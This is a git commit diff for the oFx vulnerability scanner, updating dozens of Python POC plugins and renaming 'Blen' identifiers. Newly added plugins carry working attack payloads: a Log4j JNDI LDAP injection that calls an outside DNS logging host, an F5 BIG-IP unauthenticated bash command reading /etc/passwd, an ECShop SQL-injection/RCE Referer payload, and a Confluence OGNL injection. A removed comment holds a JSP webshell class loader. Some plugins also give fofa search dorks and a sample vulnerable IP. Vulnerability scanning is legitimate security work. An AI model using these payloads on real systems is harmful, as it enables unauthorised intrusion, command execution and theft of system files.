This commit is contained in:
openx-org
2022-04-24 14:09:03 +08:00
parent a163179dd3
commit 1ecdf0d3f8
270 changed files with 923 additions and 321 deletions

View File

@@ -9,7 +9,7 @@ urllib3.disable_warnings()
class POC(POCBase):
_info = {
"author" : "jijue", # POC作者

View File

@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述写更新描述没有就不写
"name" : "mini_httpd任意文件读取漏洞(CVE-2018-18778)", # 漏洞名称
"VulnID" : "Blen-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"VulnID" : "oFx-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "", # 漏洞应用名称
"AppVersion" : "ACME mini_httpd before 1.30", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx

View File

@@ -9,12 +9,12 @@ urllib3.disable_warnings()
class POC(POCBase):
_info = {
"author" : "hansi", # POC作者
"author" : "jijue", # POC作者
"version" : "1", # POC版本默认是1
"CreateDate" : "2021-06-09", # POC创建时间
"UpdateDate" : "2021-06-09", # POC创建时间
"PocDesc" : """
组件类的漏洞并不适合直接拿到BLEN里批量扫失败是可以预见的事情笔者建议的是在渗透过程中将可疑的url拿来测试
组件类的漏洞并不适合直接拿到oFx里批量扫失败是可以预见的事情笔者建议的是在渗透过程中将可疑的url拿来测试
""", # POC描述写更新描述没有就不写
"name" : "Fastjson 反序列化远程代码执行漏洞CVE-2017-18349", # 漏洞名称
@@ -36,7 +36,9 @@ class POC(POCBase):
def _verify(self):
"""
返回vuln
存在漏洞vuln = [True,html_source] # html_source就是页面源码
不存在漏洞vuln = [False,""]
"""
vuln = [False,""]

View File

@@ -9,7 +9,7 @@ urllib3.disable_warnings()
class POC(POCBase):
_info = {
"author" : "jijue&&hansi", # POC作者
"author" : "jijue", # POC作者
"version" : "1", # POC版本默认是1
"CreateDate" : "2022-01-01", # POC创建时间
"UpdateDate" : "2022-01-01", # POC创建时间
@@ -36,7 +36,9 @@ class POC(POCBase):
def _verify(self):
"""
返回vuln
存在漏洞vuln = [True,html_source] # html_source就是页面源码
不存在漏洞vuln = [False,""]
"""
vuln = [False,""]

View File

@@ -14,7 +14,7 @@ class POC(POCBase):
"CreateDate" : "2021-06-09", # POC创建时间
"UpdateDate" : "2021-06-09", # POC创建时间
"PocDesc" : """
""", # POC描述写更新描述没有就不写
"name" : "Apache ActiveMQ 远程代码执行漏洞(CVE-2016-3088)", # 漏洞名称
@@ -27,7 +27,7 @@ class POC(POCBase):
""", # 漏洞简要描述
"fofa-dork":"""
app="APACHE-ActiveMQ"
""", # fofa搜索语句
"example" : "", # 存在漏洞的演示url写一个就可以了
"exp_img" : "", # 先不管
@@ -52,38 +52,7 @@ class POC(POCBase):
}
filename = random_str()
filecontent = random_str()
# filecontent = """
# <%!
# class ON extends ClassLoader{
# ON(ClassLoader c){super(c);}
# public Class qualified(byte[] b){
# return super.defineClass(b, 0, b.length);
# }
# }
# public byte[] interacts(String str) throws Exception {
# Class base64;
# byte[] value = null;
# try {
# base64=Class.forName("sun.misc.BASE64Decoder");
# Object decoder = base64.newInstance();
# value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] {String.class }).invoke(decoder, new Object[] { str });
# } catch (Exception e) {
# try {
# base64=Class.forName("java.util.Base64");
# Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);
# value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { str });
# } catch (Exception ee) {}
# }
# return value;
# }
# %>
# <%
# String cls = request.getParameter("123");
# if (cls != null) {
# new ON(this.getClass().getClassLoader()).qualified(interacts(cls)).newInstance().equals(new Object[]{request,response});
# }
# %>
# """
try:
"""
检测逻辑漏洞存在则修改vuln值为True漏洞不存在则不动

View File

@@ -38,7 +38,9 @@ class POC(POCBase):
def _verify(self):
"""
返回vuln
存在漏洞vuln = [True,html_source] # html_source就是页面源码
不存在漏洞vuln = [False,""]
"""
vuln = [False,""]

View File

@@ -39,7 +39,9 @@ class POC(POCBase):
def _verify(self):
"""
返回vuln
存在漏洞vuln = [True,html_source] # html_source就是页面源码
不存在漏洞vuln = [False,""]
"""
vuln = [False,""]

View File

@@ -1,72 +0,0 @@
# coding:utf-8
import requests
from lib.core.common import url_handle,get_random_ua
from lib.core.poc import POCBase
# ...
import urllib3
urllib3.disable_warnings()
class POC(POCBase):
_info = {
"author" : "hansi", # POC作者
"version" : "1", # POC版本默认是1
"CreateDate" : "2022-01-10", # POC创建时间
"UpdateDate" : "2022-01-10", # POC创建时间
"PocDesc" : """
""", # POC描述写更新描述没有就不写
"name" : "Apache Kudu存在未授权访问漏洞", # 漏洞名称
"VulnID" : "", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "Apache Kudu未授权访问漏洞", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2022-01-10", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx
"VulnDesc" : """
""", # 漏洞简要描述
"fofa-dork":"""
”Kudu”
""", # fofa搜索语句
"example" : "http://111.1.10.15:8060/", # 存在漏洞的演示url写一个就可以了
"exp_img" : "", # 先不管
}
def _verify(self):
"""
返回vuln
存在漏洞vuln = [True,html_source] # html_source就是页面源码
不存在漏洞vuln = [False,""]
"""
vuln = [False,""]
url = self.target + "" # url自己按需调整
headers = {"User-Agent":get_random_ua(),
"Connection":"close",
"Content-Type": "application/x-www-form-urlencoded",
}
try:
"""
检测逻辑漏洞存在则修改vuln值为True漏洞不存在则不动
"""
req = requests.get(url,headers = headers ,proxies = self.proxy ,timeout = self.timeout,verify = False)
if req.status_code ==200 and "RPCs" in req.text:
vuln = [True,req.text]
else:
vuln = [False,req.text]
except Exception as e:
raise e
# 以下逻辑酌情使用
if self._honeypot_check(vuln[1]) == True:
vuln[0] = False
return vuln
def _attack(self):
return self._verify()

View File

@@ -17,7 +17,7 @@ class POC(POCBase):
""", # POC描述写更新描述没有就不写
"name" : "Apache Kylin 未授权配置泄露 CVE-2020-13937", # 漏洞名称
"name" : "Apache Kylin 未授权配置泄露(CVE-2020-13937)", # 漏洞名称
"VulnID" : "CVE-2020-13937", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "Apache Kylin", # 漏洞应用名称
"AppVersion" : """
@@ -59,7 +59,7 @@ class POC(POCBase):
检测逻辑漏洞存在则修改vuln值为True漏洞不存在则不动
"""
req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
if "config" in req.text:#req.status_code == 200 and :
if '{"config":"' in req.text:#req.status_code == 200 and :
vuln = [True,req.text]
else:
vuln = [False,req.text]

View File

@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述写更新描述没有就不写
"name" : "Apache Mod_jk 访问控制权限绕过(CVE-2018-11759)", # 漏洞名称
"VulnID" : "Blen-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"VulnID" : "oFx-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "Apache Mod_jk", # 漏洞应用名称
"AppVersion" : "Apache Mod_jk Connector 1.2.0 ~ 1.2.44", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx

View File

@@ -21,7 +21,7 @@ class POC(POCBase):
""", # POC描述写更新描述没有就不写
"name" : "Apache Solr 任意文件读取漏洞", # 漏洞名称
"VulnID" : "Blen-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"VulnID" : "oFx-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "Apache Solr", # 漏洞应用名称
"AppVersion" : "Apache Solr <= 8.8.1", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx

View File

@@ -0,0 +1,85 @@
# coding:utf-8
import requests
import time
from lib.core.common import get_ceye_dns, url_handle,get_random_ua,random_str,verify_ceye_dns
from lib.core.poc import POCBase
# ...
import urllib3
urllib3.disable_warnings()
class POC(POCBase):
_info = {
"author" : "jijue", # POC作者
"version" : "1", # POC版本默认是1
"CreateDate" : "2021-06-09", # POC创建时间
"UpdateDate" : "2021-06-09", # POC创建时间
"PocDesc" : """
该漏洞没有回显因此POC需要接通dns平台现已支持知道创宇的ceye配置位置为项目根目录下的info.ini
这是笔者针对没有回显的漏洞写的第一个oFx POC以后不会解释这么多
""", # POC描述写更新描述没有就不写
"name" : "Apache Solr 远程命令执行 Log4j", # 漏洞名称
"VulnID" : "oFx-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "Apache Solr", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx
"VulnDesc" : """
Apache Solr引用了Log4j因为CVE-2021-44228 balabalaba。。我编不出来了大概的意思懂得都懂
笔者最早是在PeiQi看到的就写了这么个东西
""", # 漏洞简要描述
"fofa-dork":"""
""", # fofa搜索语句
"example" : "", # 存在漏洞的演示url写一个就可以了
"exp_img" : "", # 先不管
}
def _verify(self):
"""
返回vuln
存在漏洞vuln = [True,html_source] # html_source就是页面源码
不存在漏洞vuln = [False,""]
"""
vuln = [False,""]
success,dns_flag = get_ceye_dns()
if success == False:
return [False,dns_flag]
url = self.target + "/solr/admin/collections?action=$%7bjndi:ldap://"+dns_flag+"%7d&wt=jso" # url自己按需调整
headers = {"User-Agent":get_random_ua(),
"Connection":"close",
# "Content-Type": "application/x-www-form-urlencoded",
}
try:
"""
检测逻辑漏洞存在则修改vuln值为True漏洞不存在则不动
"""
req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
flager = verify_ceye_dns(dns_flag)
if flager == True:
vuln = [True,dns_flag]
elif flager == False:
vuln = [False,dns_flag]
else:
vuln = [False,flager]
except Exception as e:
raise e
# 以下逻辑酌情使用
if self._honeypot_check(vuln[1]) == True:
vuln[0] = False
return vuln
def _attack(self):
return self._verify()

View File

@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述写更新描述没有就不写
"name" : "BSPHP 未授权访问 信息泄露漏洞", # 漏洞名称
"VulnID" : "Blen-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"VulnID" : "oFx-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "BSPHP", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx

View File

@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述写更新描述没有就不写
"name" : "碧海威 L7 弱口令漏洞", # 漏洞名称
"VulnID" : "Blen-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"VulnID" : "oFx-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "碧海威 L7", # 漏洞应用名称
"AppVersion" : "None", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx

Binary file not shown.

View File

@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述写更新描述没有就不写
"name" : "中国移动 禹路由 ExportSettings.sh 敏感信息泄露漏洞", # 漏洞名称
"VulnID" : "Blen-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"VulnID" : "oFx-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "中国移动 禹路由", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx

View File

@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述写更新描述没有就不写
"name" : "电信天翼网关F460 web_shell_cmd.gch 远程命令执行漏洞", # 漏洞名称
"VulnID" : "Blen-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"VulnID" : "oFx-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "电信天翼网关F460", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2014-03-03", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx

View File

@@ -53,7 +53,7 @@ class POC(POCBase):
"""
vuln = [False,""]
url = self.target + "/pages/createpage-entervariables.action?SpaceKey=x" # url自己按需调整
data = "queryString=Blen\\u0027%2b#{6*666}%2b\\u0027"
data = "queryString=ofx\\u0027%2b#{6*666}%2b\\u0027"
headers = {"User-Agent":get_random_ua(),
"Connection":"close",
@@ -65,7 +65,7 @@ class POC(POCBase):
检测逻辑漏洞存在则修改vuln值为True漏洞不存在则不动
"""
req = requests.post(url,data=data,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
if "Blen{3996=null}" in req.text:
if "ofx{3996=null}" in req.text:
vuln = [True,req.text]
else:
vuln = [False,req.text]

View File

@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述写更新描述没有就不写
"name" : "Coremail 配置信息泄露漏洞", # 漏洞名称
"VulnID" : "Blen-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"VulnID" : "oFx-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "Coremail", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx

View File

@@ -19,7 +19,7 @@ class POC(POCBase):
""", # POC描述写更新描述没有就不写
"name" : "赤兔CMS banner识别插件", # 漏洞名称
"VulnID" : "Blen-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"VulnID" : "oFx-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "赤兔CMS", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx

View File

@@ -19,7 +19,7 @@ class POC(POCBase):
""", # POC描述写更新描述没有就不写
"name" : "D-Link ShareCenter DNS-320 system_mgr.cgi 远程命令执行漏洞", # 漏洞名称
"VulnID" : "Blen-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"VulnID" : "oFx-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "D-Link ShareCenter DNS-320", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx

View File

@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述写更新描述没有就不写
"name" : "D-Link AC管理系统默认账号密码", # 漏洞名称
"VulnID" : "Blen-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"VulnID" : "oFx-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "D-Link AC管理系统", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx

View File

@@ -0,0 +1,76 @@
# coding:utf-8
import requests
from lib.core.common import url_handle,get_random_ua
from lib.core.poc import POCBase
# ...
import urllib3
urllib3.disable_warnings()
class POC(POCBase):
_info = {
"author" : "jijue", # POC作者
"version" : "1", # POC版本默认是1
"CreateDate" : "2021-06-09", # POC创建时间
"UpdateDate" : "2021-06-09", # POC创建时间
"PocDesc" : """
备份文件的地址会写在md输出中
""", # POC描述写更新描述没有就不写
"name" : "DedeCMS 短文件名信息泄露", # 漏洞名称
"VulnID" : "oFx-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx
"VulnDesc" : """
IIS下会因为固有的短文件名问题导致配置文件的地址可以被猜解
猜解出来的文件url存的信息是dede_admin表的备份可能存在过期现象要有心理准备
""", # 漏洞简要描述
"fofa-dork":"""
""", # fofa搜索语句
"example" : "", # 存在漏洞的演示url写一个就可以了
"exp_img" : "", # 先不管
}
def _verify(self):
"""
返回vuln
存在漏洞vuln = [True,html_source] # html_source就是页面源码
不存在漏洞vuln = [False,""]
"""
vuln = [False,""]
url = self.target + "/data/backupdata/dede_a~" # url自己按需调整
headers = {"User-Agent":get_random_ua(),
"Connection":"close",
# "Content-Type": "application/x-www-form-urlencoded",
}
try:
"""
检测逻辑漏洞存在则修改vuln值为True漏洞不存在则不动
"""
for i in range(1,9):
now_url = url + str(i) + ".txt"
req = requests.get(now_url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
if req.status_code == 200 and "INSERT INTO `dede_admin`" in req.text:
vuln = [True,"<title>" + now_url + "</title>\n" + req.text]
break
else:
vuln = [False,req.text]
except Exception as e:
raise e
# 以下逻辑酌情使用
if self._honeypot_check(vuln[1]) == True:
vuln[0] = False
return vuln
def _attack(self):
return self._verify()

View File

@@ -17,8 +17,8 @@ class POC(POCBase):
""", # POC描述写更新描述没有就不写
"name" : "radminpass.php文件暴露", # 漏洞名称
"VulnID" : "Blen-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"name" : "织梦CMS radminpass.php文件暴露", # 漏洞名称
"VulnID" : "oFx-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "dedecms", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx

Binary file not shown.

View File

@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述写更新描述没有就不写
"name" : "DocCMS keyword SQL注入漏洞", # 漏洞名称
"VulnID" : "Blen-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"VulnID" : "oFx-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "DocCMS", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx

View File

@@ -0,0 +1,73 @@
# coding:utf-8
import requests,re
from lib.core.common import url_handle,get_random_ua
from lib.core.poc import POCBase
# ...
import urllib3
urllib3.disable_warnings()
class POC(POCBase):
_info = {
"author" : "jijue", # POC作者
"version" : "1", # POC版本默认是1
"CreateDate" : "2022-01-01", # POC创建时间
"UpdateDate" : "2022-01-01", # POC创建时间
"PocDesc" : """
""", # POC描述写更新描述没有就不写
"name" : "ECShop 2.x/3.x SQL 注入/远程代码执行漏洞", # 漏洞名称
"VulnID" : "oFx-2022-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2022-01-01", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx
"VulnDesc" : """
""", # 漏洞简要描述
"fofa-dork":"""
""", # fofa搜索语句
"example" : "", # 存在漏洞的演示url写一个就可以了
"exp_img" : "", # 先不管
}
def _verify(self):
"""
返回vuln
存在漏洞vuln = [True,html_source] # html_source就是页面源码
不存在漏洞vuln = [False,""]
"""
vuln = [False,""]
url = self.target + "/user.php?act=login" # url自己按需调整
regular = "PHP Version [0-9\.]+"
headers = {"User-Agent":get_random_ua(),
"Connection":"close",
"Referer": """45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a""",
# "Content-Type": "application/x-www-form-urlencoded",
}
try:
"""
检测逻辑漏洞存在则修改vuln值为True漏洞不存在则不动
"""
req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
if re.search(regular,req.text):#req.status_code == 200 and :
vuln = [True,req.text]
else:
vuln = [False,req.text]
except Exception as e:
raise e
# 以下逻辑酌情使用
if self._honeypot_check(vuln[1]) == True:
vuln[0] = False
return vuln
def _attack(self):
return self._verify()

View File

@@ -33,7 +33,7 @@ class POC(POCBase):
""", # 漏洞简要描述
"fofa-dork":"""
title="BIG-IP®"
title="BIG-IP®"
""", # fofa搜索语句
"example" : "https://54.206.65.62:443", # 存在漏洞的演示url写一个就可以了
"exp_img" : "", # 先不管

View File

@@ -0,0 +1,75 @@
# coding:utf-8
import requests
from lib.core.common import url_handle,get_random_ua
from lib.core.poc import POCBase
# ...
import urllib3
urllib3.disable_warnings()
class POC(POCBase):
_info = {
"author" : "jijue", # POC作者
"version" : "1", # POC版本默认是1
"CreateDate" : "2021-06-09", # POC创建时间
"UpdateDate" : "2021-06-09", # POC创建时间
"PocDesc" : """
""", # POC描述写更新描述没有就不写
"name" : "CVE-2021-22986 RCE", # 漏洞名称
"VulnID" : "oFx-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx
"VulnDesc" : """
""", # 漏洞简要描述
"fofa-dork":"""
title="BIG-IP®"
""", # fofa搜索语句
"example" : "", # 存在漏洞的演示url写一个就可以了
"exp_img" : "", # 先不管
}
def _verify(self):
"""
返回vuln
存在漏洞vuln = [True,html_source] # html_source就是页面源码
不存在漏洞vuln = [False,""]
"""
vuln = [False,""]
url = self.target + "/mgmt/tm/util/bash" # url自己按需调整
data = r'''{"command": "run", "utilCmdArgs": "-c 'cat /etc/passwd'"}'''
headers = {"User-Agent":get_random_ua(),
'Accept': '*/*',
'Connection': 'close',
'Authorization': 'Basic YWRtaW46',
'X-F5-Auth-Token': '',
'Content-Type': 'application/json'
}
try:
"""
检测逻辑漏洞存在则修改vuln值为True漏洞不存在则不动
"""
req = requests.post(url,data=data,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
if "root:/root" in req.text and req.status_code == 200:
vuln = [True,req.text]
else:
vuln = [False,req.text]
except Exception as e:
raise e
# 以下逻辑酌情使用
if self._honeypot_check(vuln[1]) == True:
vuln[0] = False
return vuln
def _attack(self):
return self._verify()

View File

@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述写更新描述没有就不写
"name" : "FLIR-AX8 download.php 任意文件下载", # 漏洞名称
"VulnID" : "Blen-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"VulnID" : "oFx-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "FLIR-AX8", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx

View File

@@ -1,59 +0,0 @@
# coding:utf-8
import requests
from lib.core.common import url_handle,get_random_ua
# ...
import urllib3
urllib3.disable_warnings()
_info = {
"author" : "", # POC作者
"version" : "1", # POC版本默认是1
"CreateDate" : "2021-06-09", # POC创建时间
"UpdateDate" : "2021-06-09", # POC创建时间
"PocDesc" : """
该POC不具备使用价值请忽略
""", # POC描述写更新描述没有就不写
"name" : "Flask 模板注入", # 漏洞名称
"AppName" : "Flask", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx
"VulnDesc" : """
""", # 漏洞简要描述
"fofa-dork":"", # fofa搜索语句
"example" : "", # 存在漏洞的演示url写一个就可以了
"exp_img" : "", # 先不管
"timeout" : 10, # 超时设定
}
def verify(host,proxy):
"""
返回vuln
存在漏洞vuln = [True,html_source] # html_source就是页面源码
不存在漏洞vuln = [False,""]
"""
vuln = [False,""]
url = url_handle(host) + "/?name={{233*233}}" # url自己按需调整
headers = {"User-Agent":get_random_ua(),
"Connection":"close",
# "Content-Type": "application/x-www-form-urlencoded",
}
try:
"""
检测逻辑漏洞存在则修改vuln值漏洞不存在则不动
"""
req = requests.get(url,headers = headers , proxies = proxy ,timeout = self.timeout,verify = False)
if req.status_code == 200 and "54289" in req.text:
vuln = [True,req.text]
else:
vuln = [False,req.text]
except Exception as e:
raise e
return vuln

View File

@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述写更新描述没有就不写
"name" : "H2 数据库 Web控制台未授权访问", # 漏洞名称
"VulnID" : "Blen-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"VulnID" : "oFx-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "H2 数据库", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx

View File

@@ -10,15 +10,16 @@ class POC(POCBase):
_info = {
"author" : "jijue", # POC作者
"version" : "1", # POC版本默认是1
"version" : "2", # POC版本默认是1
"CreateDate" : "2021-06-09", # POC创建时间
"UpdateDate" : "2021-06-09", # POC创建时间
"PocDesc" : """
v1 :
v2 : 小改进
""", # POC描述写更新描述没有就不写
"name" : "H3C SecPath 下一代防火墙 任意文件下载漏洞", # 漏洞名称
"VulnID" : "Blen-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"VulnID" : "oFx-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "H3C SecPath 下一代防火墙", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx
@@ -55,11 +56,11 @@ class POC(POCBase):
"""
检测逻辑漏洞存在则修改vuln值为True漏洞不存在则不动
"""
req0 = requests.get(url0,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
req0 = requests.get(url0,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False,allow_redirects=False)
if "root::" in req0.text and req0.status_code == 200 :
vuln = [True,req0.text]
else:
req1 = requests.get(url1,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
req1 = requests.get(url1,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False,allow_redirects=False)
if "root:" in req1.text and req1.status_code == 200:
vuln = [True,req1.text]
else:

View File

@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述写更新描述没有就不写
"name" : "HIKVISION 视频编码设备接入网关 任意文件下载", # 漏洞名称
"VulnID" : "Blen-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"VulnID" : "oFx-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "海康威视视频接入网关系统", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx

View File

@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述写更新描述没有就不写
"name" : "HIKVISION 流媒体管理服务器弱口令", # 漏洞名称
"VulnID" : "Blen-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"VulnID" : "oFx-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "HIKVISION 流媒体管理服务器", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx

View File

@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述写更新描述没有就不写
"name" : "好视通视频会议平台 任意文件下载", # 漏洞名称
"VulnID" : "Blen-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"VulnID" : "oFx-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "好视通视频会议平台", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx

View File

@@ -10,11 +10,12 @@ class POC(POCBase):
_info = {
"author" : "jijue", # POC作者
"version" : "1", # POC版本默认是1
"version" : "2", # POC版本默认是1
"CreateDate" : "2021-06-09", # POC创建时间
"UpdateDate" : "2021-06-09", # POC创建时间
"PocDesc" : """
笔者没有zoomeye高级账号所以就没测试了换而言之该POC不一定靠谱
v1 : 笔者没有zoomeye高级账号所以就没测试了换而言之该POC不一定靠谱
v2 : 笔者特地去zoomeye找资产测试然后做了点优化这回应该靠谱了
""", # POC描述写更新描述没有就不写
"name" : "宏电 H8922 后台任意文件读取漏洞", # 漏洞名称
@@ -56,7 +57,7 @@ class POC(POCBase):
检测逻辑漏洞存在则修改vuln值为True漏洞不存在则不动
"""
req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
if "root:" in req.text and req.status_code == 200:
if "root:" in req.text and req.status_code == 200 and "application/octet-stream" in req.headers["Content-Type"]:
vuln = [True,req.text]
else:
vuln = [False,req.text]

View File

@@ -18,7 +18,7 @@ class POC(POCBase):
